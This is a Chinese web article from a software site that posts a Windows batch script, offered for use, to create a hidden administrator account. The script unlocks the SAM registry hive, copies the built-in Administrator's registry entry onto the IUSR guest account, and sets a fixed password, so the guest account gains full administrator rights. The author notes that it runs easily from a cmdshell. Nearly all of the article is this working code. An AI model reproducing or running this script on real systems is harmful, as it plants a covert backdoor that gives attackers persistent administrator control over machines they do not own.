批处理实现的隐藏administrator账号pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范批处理实现的隐藏administrator账号

批处理实现的隐藏administrator账号


2009/2/21  编辑:佚名 来源:本站整理  关键词:

批处理实现的隐藏administrator账号

 

其实就是注册表里复制管理员权限到普通用户那个操作,不过毕竟批处理容易就在cmdshell里实现, 贴出来吧
echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678

克隆出来的用户名是固定的,随便变换的话要改代码

相关文章
  • 实用的dos/bat批处理教程
  • 批处理备份交换机日志的方法
  • 用批处理实现屏蔽恶意网址
  • ARP绑定网关及批处理
  • 用于备份网站的批处理文件
  • 批处理实现的隐藏administrator账号
  • 批处理战KV主防
  • 批处理整理集合
  • 批处理打造自己的安全工具
  • 一个批处理搞定所有客户机arp绑定
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图